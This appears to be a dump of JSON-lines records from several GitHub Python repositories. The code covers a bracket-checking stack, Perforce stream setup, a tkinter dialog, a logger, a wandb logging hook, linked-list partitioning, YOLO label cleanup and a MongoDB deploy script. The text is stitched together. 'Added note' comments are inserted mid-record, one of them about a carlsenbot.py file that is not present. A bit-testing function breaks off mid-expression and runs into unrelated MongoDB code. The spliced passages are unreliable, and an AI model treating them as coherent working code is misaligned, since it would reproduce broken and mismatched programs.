self.my_list.empty():\n position_first_open = curr_position\n self.my_list.pushTop(char)\n elif char in close:\n print(\"In remove with \" + char)\n if char == ')' and self.my_list.getTop() != '(':\n print (str(curr_position) + \" : \" + char + \" : \" + self.my_list.getTop())\n exit()\n elif char == ']' and self.my_list.getTop() != '[':\n print (str(curr_position) + \" : \" + char + \" : \" + self.my_list.getTop())\n exit()\n elif char == '}' and self.my_list.getTop() != '{':\n print (str(curr_position) + \" : \" + char + \" : \" + self.my_list.getTop())\n exit()\n else:\n self.my_list.popTop() \n if self.my_list.empty() is not True:\n print (\"Checking if list is empty...\") \n print (self.my_list.empty())\n \n else:\n print ('Success') \n self.my_list.printLinkedList() \n\n\nclass LinkedList:\n \n def __init__(self):\n self.head = self.tail = None\n \n def empty(self):\n if self.head is None:\n return True\n else:\n return False \n \n def pushTop(self, item):\n newNode = Node(item, None) \n #print('New node created: ' + item )\n if self.head is None: # if 
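# --- Added note on the tasks.loop timers in carlsenbot.py above ---
# The large second counts (196400 s, 143200 s) amount to multi-day intervals;
# tasks.loop also accepts hours/minutes directly. A hypothetical daily variant
# reusing the bot's own get_quote() and channel id (start it in on_ready, like
# the loops above, with daily_quote.start()):
from discord.ext import tasks

@tasks.loop(hours=24)
async def daily_quote():
    channel = magnus.get_channel(890990298585497687)  # channel id from above
    await channel.send(get_quote())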
linked list is empty\n self.head = newNode\n self.tail = newNode\n print('New node added to stack: ' + item )\n else:\n newNode.next = self.head\n self.head = newNode\n print('New node added to stack: ' + item ) \n \n def getTop(self):\n return self.head.value\n \n \n def popTop(self):\n if self.head is not None: # if linked list is not empty\n top = self.head\n if top.next is not None: # check if there is next Node in list\n self.head = top.next\n else: # reset linked list to empty state if no next Node\n self.head = None\n self.tail = None\n print('New node removed from stack: ' + top.value) \n return top \n else:\n return None\n\n def printLinkedList(self):\n if self.empty:\n print(\"List is empty\")\n else:\n curr_node = self.head\n while (curr_node is not None):\n print (curr_node.value)\n if curr_node.next is None:\n break\n else:\n curr_node = curr_node.next \n \n '''No further operations need to be implemented on LinkedList in order\n to perform as a Stack...''' \n \n \nclass Node:\n def __init__(self, value, next):\n self.value = value\n self.next = next\n \n\n \nif __name__ == '__main__':\n s1 = '{}[]'\n s2 = '[]'\n s3 = '{}[]' \n s4 = '[()]'\n s5 = '(())'\n s6 = '{[]}()'\n s7 = '{{{('\n s8 = '{[}'\n s9 = 'foo(bar);' \n s10 = 'foo(bar[i);' \n my_stack = Stack(s6)\n my_stack.checkBalance()\n \n \n\n\n\n\n\n","repo_name":"susieagerholm/PythonDataStructures","sub_path":"Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18714674791","text":"from pathlib import PurePosixPath\nfrom pprint import pprint\n\nfrom P4 import P4\n\n# from random_word import RandomWords\n\nTEMPLATE_DEPOT_NAME = \"template\"\nTEMPLATE_BRANCH_VIEW = [\n '\"{template_folder_path}/...\" \"{dev_folder_path}/...\"',\n '\"{template_rs_path}\" \"{dev_folder_path}/{new_rs_filename}\"',\n '\"{template_uproject_path}\" \"{dev_folder_path}/{new_uproject_filename}\"',\n]\n\np4 = P4()\np4.connect()\n\n\ndef main():\n branch_map = p4.fetch_branch(\"test\")\n project_name = validate_input(\"Enter name for new project: \", lambda x: len(x) > 2)\n depot_name = create_depot(project_name)\n stream = select_stream(f\"//{TEMPLATE_DEPOT_NAME}/...\")\n uproject_path = select_uproject(stream)\n prod_stream_spec, dev_stream_spec = create_streams(\n depot_name, stream[\"Stream\"], project_name\n )\n branch_map = make_branch_map(uproject_path, dev_stream_spec, project_name)\n populate_new_streams(branch_map, dev_stream_spec, project_name)\n delete_branch_map(branch_map)\n\n\ndef select_stream(depot_path: str):\n streams = p4.run_streams(depot_path)\n print(\"Select which template stream by number:\")\n for i, stream in enumerate(streams):\n print(f\"{i+1}: {stream['Stream']} - {stream['desc'].strip()}\")\n selection = validate_input(\"> \", lambda x: int(x) > 0 and int(x) <= len(streams))\n return streams[int(selection) - 1]\n\n\ndef select_uproject(stream: dict):\n files = p4.run_files(f'{stream[\"Stream\"]}/....uproject')\n for i, file in enumerate(files):\n print(f\"{i+1}: {file['depotFile']}\")\n selection = validate_input(\"> \", lambda x: int(x) > 0 and int(x) <= len(files))\n return files[int(selection) - 1]\n\n\ndef create_depot(project_name: str):\n # Get a depot-friendly name!\n depot_name = f'prj-{project_name.lower().replace(\" \", \"-\")}'\n if depot_exists(depot_name):\n print(\n f\"A depot already exists with the name {depot_name}.\"\n \"\\nEnter 'y' to use this existing depot. 
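# --- Added note on the bracket checker in Stack.py above ---
# The class-based checker exits the process on the first mismatch; a compact
# functional equivalent (assuming only (), [], {} matter) returns a bool:
def balanced(s):
    pairs = {')': '(', ']': '[', '}': '{'}
    stack = []
    for ch in s:
        if ch in '([{':
            stack.append(ch)
        elif ch in pairs:
            if not stack or stack.pop() != pairs[ch]:
                return False
    return not stack

print(balanced('foo(bar[i);'))  # False
print(balanced('{[]}()'))       # True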
Anything else to abort.\"\n )\n resp = input(\"> \").strip()\n if resp == \"y\":\n return depot_name\n raise Exception(\"Aborting... Depot already exists.\")\n depot = p4.fetch_depot(\"-t\", \"stream\", depot_name)\n depot[\"Description\"] = f\"The depot for Project {project_name}.\"\n p4.save_depot(depot)\n\n # Get a depot-friendly name!\n print(f\"Depot {depot_name} successfully created!\")\n return depot_name\n\n\ndef depot_exists(depot_name):\n return depot_name.lower() in [depot[\"name\"].lower() for depot in p4.run_depots()]\n\n\ndef create_streams(depot_name: str, template_stream: str, project_name: str):\n prod_stream_spec = create_mainline_stream(\n depot_name, template_stream, \"prod\", project_name\n )\n dev_stream_spec = create_development_stream(\n depot_name, prod_stream_spec, \"dev\", project_name\n )\n return prod_stream_spec, dev_stream_spec\n\n\ndef create_mainline_stream(\n depot_name: str, from_stream: str, stream_name: str, project_name: str\n):\n from_stream_spec = p4.run_stream(\"-o\", from_stream)[0]\n new_stream_spec = p4.fetch_stream(f\"//{depot_name}/{stream_name}\")\n new_stream_spec[\"Type\"] = \"mainline\"\n new_stream_spec[\"Paths\"] = from_stream_spec[\"Paths\"]\n new_stream_spec[\"Ignored\"] = from_stream_spec.get(\"Ignored\", [])\n new_stream_spec[\"Remapped\"] = from_stream_spec.get(\"Remapped\", [])\n new_stream_spec[\n \"Description\"\n ] = f\"The production stream for Project {project_name}.\"\n p4.save_stream(new_stream_spec)\n print(f\"Created stream {new_stream_spec['Name']} at {new_stream_spec['Stream']}\")\n return new_stream_spec\n\n\ndef create_development_stream(\n depot_name: str, parent_stream: dict, stream_name: str, project_name: str\n):\n new_stream_spec = p4.fetch_stream(f\"//{depot_name}/{stream_name}\")\n new_stream_spec[\"Parent\"] = parent_stream[\"Stream\"]\n new_stream_spec[\n \"Description\"\n ] = f\"The development stream for Project {project_name}.\"\n p4.save_stream(new_stream_spec)\n print(f\"Created stream {new_stream_spec['Name']} at {new_stream_spec['Stream']}\")\n return new_stream_spec\n\n\ndef make_branch_map(\n template_project: dict,\n development_stream: dict,\n project_name: str,\n):\n branch_map = p4.fetch_branch(f\"branch_map_{project_name.lower().replace(' ', '_')}\")\n # first is just the folder name\n template_uproject_path = PurePosixPath(template_project[\"depotFile\"])\n template_folder_path = template_uproject_path.parent\n template_rs_path = (\n f\"{template_uproject_path.parent}/rs_{template_uproject_path.stem.lower()}.json\"\n )\n dev_folder_path = f'{development_stream[\"Stream\"]}/Project {project_name}'\n new_uproject_filename = f'Project_{project_name.replace(\" \", \"_\")}.uproject'\n new_rs_filename = f'rs_project_{project_name.lower().replace(\" \", \"_\")}.json'\n\n branch_map[\"View\"] = [\n view.format(\n template_folder_path=template_folder_path,\n dev_folder_path=dev_folder_path,\n template_rs_path=template_rs_path,\n template_uproject_path=template_uproject_path,\n new_rs_filename=new_rs_filename,\n new_uproject_filename=new_uproject_filename,\n )\n for view in TEMPLATE_BRANCH_VIEW\n ]\n\n p4.save_branch(branch_map)\n print(f\"Created branch map {branch_map['Branch']}\")\n return branch_map[\"Branch\"]\n\n\ndef delete_branch_map(branch_map: str):\n p4.run_branch(\"-d\", branch_map)\n print(f\"Deleted branch mapping {branch_map}\")\n\n\ndef populate_new_streams(branch_map, dev_stream_spec, project_name):\n print(\n f\"Populating with initial template for Project {project_name} into dev 
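# --- Added note on the Perforce admin script above (jase_scratchpad.py) ---
# The script calls p4.run_* without a guard; P4Python raises P4Exception and
# collects messages on the connection object. A minimal hedged wrapper:
from P4 import P4, P4Exception

def with_p4(fn):
    p4 = P4()
    try:
        p4.connect()
        return fn(p4)
    except P4Exception:
        for err in p4.errors:  # populated by the failing run_* call
            print('p4 error:', err)
    finally:
        if p4.connected():
            p4.disconnect()

with_p4(lambda p4: print(p4.run_info()[0]['serverVersion']))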
stream...\"\n )\n p4.run_populate(\n \"-d\",\n f\"Populating with initial template for Project {project_name} into dev stream\",\n \"-b\",\n branch_map,\n )\n print(\n f\"Populating with initial template for Project {project_name} into prod stream...\"\n )\n p4.run_populate(\n \"-d\", \"Populating prod stream from dev stream\", \"-S\", dev_stream_spec[\"Stream\"]\n )\n\n\ndef validate_input(prompt: str, validation_function=lambda x: True):\n while True:\n resp = input(prompt)\n try:\n if validation_function(resp):\n return resp\n except Exception as e:\n print(\"Invalid input: \", e)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vertigojc/p4pythonic","sub_path":"jase_scratchpad.py","file_name":"jase_scratchpad.py","file_ext":"py","file_size_in_byte":6361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14650273089","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter.font import BOLD\nfrom PIL import Image, ImageTk\nfrom ErrorTest import resetFileBox, showError\nfrom filePrompt import showPrompt\nfrom Data_Cleaning_wPandas_Purch import processFile\n#from SortingOptions import process\nimport sys\nimport os\nimport pathlib\nimport subprocess\nimport time\n\n\n\nclass promptWindow(tk.Toplevel):\n \n def __init__(self, label_file_explorer, saveAs, pickList):\n super().__init__() \n \n self.focus_set()\n self.grab_set_global()\n\n root_dir = \"C:/Users/tbrasher/Documents/PurchBuilder/\"\n\n\n def resource_path(relative_path):\n try:\n #print('directory = ', os.getenv())\n #print('base path = ', base_path)\n base_path = getattr(sys,'_MEIPASS', os.getcwd())\n return os.path.join(base_path, relative_path)\n \n except Exception:\n #print('current directory = ', pathlib.Path(__file__).parent.resolve())\n base_path = pathlib.Path(__file__).parent.resolve()\n #print('abs path = ', base_path)\n return os.path.join(base_path, relative_path)\n\n \n title = tk.Text(self, font= (\"Arial 10 bold\"), background=\"light gray\",\n padx=120.5, pady=2.5, width = 8, height = 1)\n title.insert(\"1.0\", \"Message\")\n title.configure(state=\"disabled\")\n title.place(x=2.5, y=2.5)\n \n \n\n #f = tk.Frame(width = 300, height = 150)\n self.c = tk.Canvas(self, bg= \"white\", width = 300, height =125)\n self.c.pack() \n \n #image = Image.open(root_dir+\"/Files/Logos/background.png\")\n image = Image.open(resource_path(\"Files\\\\Logos/background.png\"))\n self.background_image = ImageTk.PhotoImage(image)\n self.c.create_image(0, 0, image = self.background_image, anchor = NW)\n \n self.overrideredirect(True)\n self.resizable(0,0)\n\n # window sizing and positioning\n window_width = 300\n window_height = 125\n scr_width = self.winfo_screenwidth()\n scr_height = self.winfo_screenheight()\n\n ctr_x = int(scr_width/2 - window_width/2)\n ctr_y = int(scr_height/2 - window_height/2)\n\n self.geometry(f'{window_width}x{window_height}+{ctr_x}+{ctr_y}')\n self.resizable(False, False)\n \n message = self.c.create_text(150, 50, text=\"Processing...\",\n fill = \"white\", font=(\"Arial\", 12, \"bold\"), width = 280, justify=CENTER)\n \n prompt = self.c.create_text(150, 72, text=\"Please Wait\",\n fill = \"white\", font=(\"Arial\", 12), width = 280, justify=CENTER)\n\n try:\n self.update()\n self.after(.1, processFile(self, label_file_explorer, saveAs, pickList))\n except:\n self.withdraw()\n showError(label_file_explorer)\n\n \n\n\n\ndef showProcessingPrompt(label_file_explorer, saveAs, pickList):\n programPrompt = 
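# --- Added note on promptWindow in processing_prompt.py above ---
# `self.after(.1, processFile(...))` executes processFile immediately and hands
# its return value to after(); Tk's after() expects a millisecond int plus a
# callable and its args. The deferred form would be (same names as above):
# self.after(100, processFile, self, label_file_explorer, saveAs, pickList)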
promptWindow(label_file_explorer, saveAs, pickList)\n programPrompt.mainloop()\n\n\n\n\n\n\n#showPrompt(None)\n","repo_name":"tjbrasher/PurchBuilder","sub_path":"processing_prompt.py","file_name":"processing_prompt.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"1554658974","text":"'''\nhttps://www.codewars.com/kata/simple-pig-latin/train/python\n\nDifficulty: 5 kyu\n\nMove the first letter of each word to the end of it, then add \"ay\" to the end of the word. Leave punctuation marks untouched.\n\nExamples\npig_it('Pig latin is cool') # igPay atinlay siay oolcay\npig_it('Hello world !') # elloHay orldway !\n\nALGORITHMS\n'''\n\ndef pig_it(text):\n scrambled_words = \"\"\n for word in text.split():\n if word in ['!', '?']:\n scrambled_word = word + \" \"\n elif len(word) == 1:\n scrambled_word = word + \"ay \"\n else:\n scrambled_word = word[1:] + word[0] + \"ay \"\n scrambled_words += scrambled_word\n return scrambled_words[:-1]\n\n###################################################\n###################################################\n###################################################\n\n'''\nTest.assert_equals(pig_it('Pig latin is cool'),'igPay atinlay siay oolcay')\nTest.assert_equals(pig_it('This is my string'),'hisTay siay ymay tringsay')\n'''","repo_name":"khan-hasan/coding-problems","sub_path":"Python/simple_pig_latin.py","file_name":"simple_pig_latin.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"20659168013","text":"import logging\nimport sys\n\nFORMATTER = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\nloggers = {}\n\ndef get_console_handler():\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(FORMATTER)\n return console_handler\n\ndef get_file_handler(filename):\n file_handler = logging.FileHandler(filename)\n file_handler.setFormatter(FORMATTER)\n return file_handler\n\ndef setup_custom_logger(name, filename=None, console=True, log_level=logging.DEBUG):\n if loggers.get(name):\n return loggers[name]\n\n logger = logging.getLogger(name)\n loggers[name] = logger\n\n logger.setLevel(log_level)\n\n if(not filename is None and console == True):\n logger.addHandler(get_console_handler())\n logger.addHandler(get_file_handler(filename))\n elif(not filename is None and console == False):\n logger.addHandler(get_file_handler(filename))\n else:\n logger.addHandler(get_console_handler())\n \n # with this pattern, it's rarely necessary to propagate the error up to parent\n logger.propagate = False\n\n return logger\n","repo_name":"moranelli/tradingbot","sub_path":"app/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20834717586","text":"import os.path as osp\n\nfrom mmcv.utils import scandir\nfrom ...dist_utils import master_only\nfrom ..hook import HOOKS\nfrom .base import LoggerHook\n\n\n@HOOKS.register_module()\nclass WandbLoggerHook(LoggerHook):\n \"\"\"Class to log metrics with wandb.\n\n It requires `wandb`_ to be installed.\n\n\n Args:\n init_kwargs (dict): A dict contains the initialization keys. 
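# --- Added usage note for setup_custom_logger in utils/log.py above ---
# The module-level `loggers` dict memoizes by name, so repeated calls return
# the same logger instead of stacking duplicate handlers. Hypothetical usage:
log = setup_custom_logger('tradingbot', filename='bot.log', console=True)
log.info('started')
assert setup_custom_logger('tradingbot') is log  # cached, no new handlers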
Check\n https://docs.wandb.ai/ref/python/init for more init arguments.\n interval (int): Logging interval (every k iterations).\n Default 10.\n ignore_last (bool): Ignore the log of last iterations in each epoch\n if less than `interval`.\n Default: True.\n reset_flag (bool): Whether to clear the output buffer after logging.\n Default: False.\n commit (bool): Save the metrics dict to the wandb server and increment\n the step. If false ``wandb.log`` just updates the current metrics\n dict with the row argument and metrics won't be saved until\n ``wandb.log`` is called with ``commit=True``.\n Default: True.\n by_epoch (bool): Whether EpochBasedRunner is used.\n Default: True.\n with_step (bool): If True, the step will be logged from\n ``self.get_iters``. Otherwise, step will not be logged.\n Default: True.\n log_artifact (bool): If True, artifacts in {work_dir} will be uploaded\n to wandb after training ends.\n Default: True\n `New in version 1.4.3.`\n out_suffix (str or tuple[str], optional): Those filenames ending with\n ``out_suffix`` will be uploaded to wandb.\n Default: ('.log.json', '.log', '.py').\n `New in version 1.4.3.`\n\n .. _wandb:\n https://docs.wandb.ai\n \"\"\"\n\n def __init__(self,\n init_kwargs=None,\n interval=10,\n ignore_last=True,\n reset_flag=False,\n commit=True,\n by_epoch=True,\n with_step=True,\n log_artifact=True,\n out_suffix=('.log.json', '.log', '.py')):\n super(WandbLoggerHook, self).__init__(interval, ignore_last,\n reset_flag, by_epoch)\n self.import_wandb()\n self.init_kwargs = init_kwargs\n self.commit = commit\n self.with_step = with_step\n self.log_artifact = log_artifact\n self.out_suffix = out_suffix\n\n def import_wandb(self):\n try:\n import wandb\n except ImportError:\n raise ImportError(\n 'Please run \"pip install wandb\" to install wandb')\n self.wandb = wandb\n\n @master_only\n def before_run(self, runner):\n super(WandbLoggerHook, self).before_run(runner)\n if self.wandb is None:\n self.import_wandb()\n if self.init_kwargs:\n self.wandb.init(**self.init_kwargs)\n else:\n self.wandb.init()\n\n @master_only\n def log(self, runner):\n tags = self.get_loggable_tags(runner)\n if tags:\n if self.with_step:\n self.wandb.log(\n tags, step=self.get_iter(runner), commit=self.commit)\n else:\n tags['global_step'] = self.get_iter(runner)\n self.wandb.log(tags, commit=self.commit)\n\n @master_only\n def after_run(self, runner):\n if self.log_artifact:\n wandb_artifact = self.wandb.Artifact(\n name='artifacts', type='model')\n for filename in scandir(runner.work_dir, self.out_suffix, True):\n local_filepath = osp.join(runner.work_dir, filename)\n wandb_artifact.add_file(local_filepath)\n self.wandb.log_artifact(wandb_artifact)\n self.wandb.join()\n","repo_name":"jshilong/GPT4RoI","sub_path":"mmcv-1.4.7/mmcv/runner/hooks/logger/wandb.py","file_name":"wandb.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":375,"dataset":"github-code","pt":"2"} +{"seq_id":"25141872785","text":"import argparse\nimport os\nimport GraphEmbed.Config\nfrom GraphEmbed.scripts.baseUtil import get_graph_dirs, read_args, transformed_file\nfrom GraphEmbed.Config import Config\nimport sys\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Parse results.txt file and place the results in graph folder')\n parser.add_argument('--path', required=True, type=str,\n help='Path to directory containing results.txt')\n parser.add_argument('--log', action='store_false',\n help='redirect standard output to a file 
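# --- Added note on the WandbLoggerHook artifact upload above ---
# after_run scans work_dir for matching files and uploads them; the same wandb
# calls in isolation (assumes `wandb login` has been run; paths hypothetical):
import wandb

run = wandb.init(project='demo')
artifact = wandb.Artifact(name='artifacts', type='model')
artifact.add_file('work_dir/run.log')  # hypothetical file
run.log_artifact(artifact)
run.finish()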
(default:True)')\n args = parser.parse_args()\n return args\n\n\ndef yield_results(result_file):\n with open(result_file, 'r') as rf:\n lines = rf.readlines()\n count = 0\n for i, line in enumerate(lines):\n if line.startswith(\"Input Files Path\"):\n path = (line.split(':')[1]).strip('\\n').strip()\n if line.startswith(\"no type\"):\n start_index = i\n if line.startswith(\"averaged(filter)\"):\n if count == 1:\n result = lines[start_index : i+1]\n count = 0\n yield (path, result)\n else:\n count = count + 1\n \ndef parse_results(arg_file, result_file):\n opt = read_args(arg_file)\n \n if opt['embedding_type'] in ['openne', 'transformed']:\n embed_file = os.path.join(Config.EMBEDDINGS_DIR, str(opt['dim']), opt['openne_type'], Config.EMBEDDINGS_FILE)\n if opt['embedding_type'] == 'transformed':\n embed_file = transformed_file(embed_file, opt['eval_method'])\n else:\n embed_file += '.' + opt['eval_method']\n elif opt['embedding_type'] == 'openne_openke':\n embed_file = os.path.join(Config.EMBEDDINGS_DIR, str(opt['dim']), opt['openne_type'], opt['eval_method'] + '.json')\n else:\n embed_file = os.path.join(Config.EMBEDDINGS_DIR, str(opt['dim']), opt['eval_method'] + '.json')\n \n for path, result in yield_results(result_file):\n result_file = os.path.join(path, embed_file + '.result')\n with open(result_file, 'w') as wf:\n wf.writelines(result)\n\ndef main(args):\n result_file = os.path.join(args.path, 'results.txt')\n args_file = os.path.join(args.path, Config.ARGS_FILE)\n if not os.path.exists(result_file):\n print(\"File Not Found: \", result_file)\n if not os.path.exists(args_file):\n print(\"File Not Found: \", args_file)\n \n parse_results(args_file, result_file)\n\nif __name__ == '__main__':\n args = parse_args()\n if args.log:\n sys.stdout = open(Config.LOG_FILE, 'a')\n main(args)","repo_name":"ArchitParnami/Node2KG","sub_path":"GraphEmbed/scripts/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"73828188846","text":"class Node:\n def __init__(self, val, next):\n self.val = val\n self.next = next\n\n# 링크드 리스트 value 와 x 값을 입력 받는다.\narr = list(map(int,input().split()))\nx_value = int(input())\n\n# 링크드리스트 생성\nh = None\nfor i in range(len(arr)-1,-1,-1):\n Node(arr[i],h)\n h = Node(arr[i],h)\n\ntemp = h\nprint(\"====linked list====\")\nwhile h != None:\n if h.next != None:\n print(h.val, end = ' ')\n else:\n print(h.val)\n h = h.next\n \n# x 노드만 빼기\nh = temp\nwhile True:\n if h.next == None:\n break\n if h.next.val == x_value:\n isFind = True\n nh = h.next\n h.next = h.next.next\n nh.next = None\n break\n h = h.next\n\n# x 노드 기준으로 작으면 왼쪽 크거나 같으면 오른쪽으로 노드들을 붙이기\nnt = nh\nwhile temp != None:\n next_node = temp.next\n if temp.val < x_value:\n temp.next = nh\n nh = temp\n else:\n nt.next = temp\n nt = temp\n nt.next = None\n temp = next_node\n\n# 새로운 링크드 리스트 출력.\nprint(\"====New linked list====\")\nwhile nh != None:\n if nh.next != None:\n print(nh.val, end = ' ')\n else:\n print(nh.val)\n nh = nh.next\n\n# 테스트 코드\n# 4 3 2 6\n# 3\n\n\n# 4 3 1 5 6 7 8 9\n# 6\n\n\n# 1 1 1 3 3 3 2 2 2 4 4\n# 3\n\n# 3 3 3 3 1\n# 1","repo_name":"Jeoungseungho/python-coding-study","sub_path":"김인호/(링크드리스트)책_2-4.py/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"ko","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"70458578928","text":"# deletes jpg files without matching annotation 
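# --- Added note on the linked-list partition above (Korean-commented solution.py) ---
# The node rewiring pulls the first x out, then keeps values < x on its left
# and values >= x on its right (the prepend loop reverses the left half). The
# same split on a plain list, kept in original order here for comparison:
def partition(values, x):
    values = list(values)
    values.remove(x)  # pull out the pivot, as the x-node removal does above
    left = [v for v in values if v < x]
    right = [v for v in values if v >= x]
    return left + [x] + right

print(partition([4, 3, 2, 6], 3))  # [2, 3, 4, 6]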
txt files and vice versa\r\n\r\nimport os, glob\r\n\r\ntxt_dataset_path = \"D:\\\\Datasets\\\\Object_Detection_and_Classification_Only_Damages_YOLO\\\\labels\\\\\" \r\nimgs_dataset_path = \"D:\\\\Datasets\\\\Object_Detection_and_Classification_Only_Damages_YOLO\\\\images\\\\\" \r\n\r\ntxt_paths = glob.glob(os.path.join(txt_dataset_path, \"*.txt\"))\r\njpg_paths = glob.glob(os.path.join(imgs_dataset_path, \"*.jpg\"))\r\n\r\nto_del = []\r\n\r\n# img file not annotated, e.g. img is filtered out\r\ntxt_files = [txt_file.split(os.sep)[-1].split(\".\")[0] for txt_file in txt_paths]\r\nfor jpg_file in jpg_paths:\r\n eq_txt = jpg_file.split(os.sep)[-1].split(\".\")[0]\r\n if eq_txt not in txt_files:\r\n to_del.append(jpg_file)\r\n\r\n# annotation for non existant img\r\njpg_files = [jpg_file.split(os.sep)[-1].split(\".\")[0] for jpg_file in jpg_paths]\r\nfor txt_file in txt_paths:\r\n eq_jpg = txt_file.split(os.sep)[-1].split(\".\")[0]\r\n if eq_jpg not in jpg_files:\r\n to_del.append(txt_file)\r\n\r\n# no new labels / empty file\r\nfor txt_file in txt_paths:\r\n with open(txt_file, 'r') as txt_file_content:\r\n if len(str(txt_file_content.read()))<5:\r\n to_del.append(txt_file)\r\n\r\nprint(f\"deleting {len(to_del)} files\")\r\nfor file in to_del:\r\n os.remove(file)\r\n\r\n# use while next with 2 pointers instead => O(n)","repo_name":"MaherDissem/Data-Manipulation-Scripts","sub_path":"clean_yolo_folder.py","file_name":"clean_yolo_folder.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74207613167","text":"# coding:utf-8\nfrom main.run import Run\n\nclass HomeCase:\n def __init__(self):\n self.json_file = \"/Users/mac/Desktop/测试资料/蜗牛家产品线/woniujia_cc_jiekou/woniujia_cc_jiekou_git/woniujia_cc_project/dataconfig/request_pram.json\"\n self.sheet_name = \"首页模块\"\n self.sheet_id = 1\n self.sql_base = \"effect20190628\"\n\n def go_run_home(self):\n # run_comm = RunCommon(self.json_file, self.sheet_name, self.sheet_id)\n # run_comm.go_run_case()\n run = Run(self.json_file, self.sheet_name, self.sheet_id, self.sql_base)\n run.go_to_run()\n\nif __name__ == '__main__':\n homecase = HomeCase()\n homecase.go_run_home()","repo_name":"GorkyZH/woniujia_cc_jiekou","sub_path":"woniujia_cc_project/case/home_case.py","file_name":"home_case.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3030874485","text":"#!/usr/bin/env python\n\nimport os\nimport numpy as np\nfrom filterpicker import filterpicker as FP\n\nmoduledir = os.path.dirname(FP.__file__)\nfpp = FP.FilterPicker(0.008, np.loadtxt(moduledir + '/tests/fg_sac.npa'),\n filter_window=1.6, longterm_window=3.2, t_up=0.16,\n threshold_1=20, threshold_2=10)\npidx, punc, pfrq = fpp.run()\nprint(pidx, punc, pfrq)\nfpp.plot()\n","repo_name":"mbagagli/filterpicker","sub_path":"examples_tests/fp_script.py","file_name":"fp_script.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"2"} +{"seq_id":"42110452045","text":"def getBit(M, i):\n if int(M,2) & (1<= self.mongoss:\n self.host_roles['db'] = [self.createdb[i:i + self.replicas] for i in range(0,\n (self.replicas) * self.nodegroups, self.replicas)]\n self.host_roles['config'] = self.createdb[self.replicas *\n self.nodegroups:self.replicas * self.nodegroups + self.configs:]\n self.host_roles['mongos'] = 
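# --- Added note on clean_yolo_folder.py above ---
# Its closing comment asks for an O(n) pairing; set differences over file stems
# give exactly that (reusing txt_dataset_path / imgs_dataset_path from above):
from pathlib import Path

txt_stems = {p.stem for p in Path(txt_dataset_path).glob('*.txt')}
jpg_stems = {p.stem for p in Path(imgs_dataset_path).glob('*.jpg')}
orphans = [Path(imgs_dataset_path) / f'{s}.jpg' for s in jpg_stems - txt_stems]
orphans += [Path(txt_dataset_path) / f'{s}.txt' for s in txt_stems - jpg_stems]
for f in orphans:
    f.unlink()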
self.createdb[self.replicas * self.nodegroups + self.configs::]\n else:\n logger.error(\"mongodb服务地址的个数未达到设置的数量,请查看配置\")\n elif self.replication_mode:\n if len(self.createdb) > 0:\n self.host_roles['db'] = [ self.createdb ]\n self.host_roles['config'] = []\n self.host_roles['mongos'] = []\n else:\n logger.error(\"未添加mongodb服务地址\")\n\n def init_db(self, grouphosts, groups):\n logger.info(\"修改mongo.conf文件\")\n with open('/root/mongo-pkg/mongo.conf-default', 'r', encoding='utf-8') as fr:\n mongo_yaml = yaml.safe_load(fr)\n mongo_yaml['systemLog']['path'] = f\"{self.cnfdir}/mongo.log\"\n mongo_yaml['processManagement']['pidFilePath'] = f\"{self.cnfdir}/mongo.pid\"\n mongo_yaml['net']['port'] = self.mongoport\n mongo_yaml['net']['unixDomainSocket']['pathPrefix'] = self.cnfdir\n mongo_yaml['storage']['dbPath'] = self.datadir\n if self.mongocachesize:\n mongo_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = self.mongocachesize\n else:\n mongo_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = cachesize\n mongo_yaml['replication']['oplogSizeMB'] = str(sizemb)\n if self.cluster_mode:\n mongo_yaml['replication']['replSetName'] = f'{self.mongoreplname}-shard0{groups}'\n mongo_yaml['sharding'] = {}\n mongo_yaml['sharding']['clusterRole'] = 'shardsvr'\n else:\n mongo_yaml['replication']['replSetName'] = self.mongoreplname\n if not grouphosts.index(f'{ip}:{self.mongoport}') == 0 and f'{ip}:{self.mongoport}' in grouphosts:\n mongo_yaml['security'] = {}\n mongo_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n mongo_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/mongo.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(mongo_yaml, fw)\n logger.info(\"创建用户和文件授权\")\n subprocess.call(\"useradd -M -s /sbin/nologin mongo\", shell=True)\n subprocess.call(\"chown -R mongo.mongo {0}\".format(self.perfix), shell=True)\n logger.info(\"启动数据库\")\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/mongo.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n\n def init_config(self, grouphosts):\n logger.info(\"修改config.conf文件\")\n with open('/root/mongo-pkg/config.conf-default', 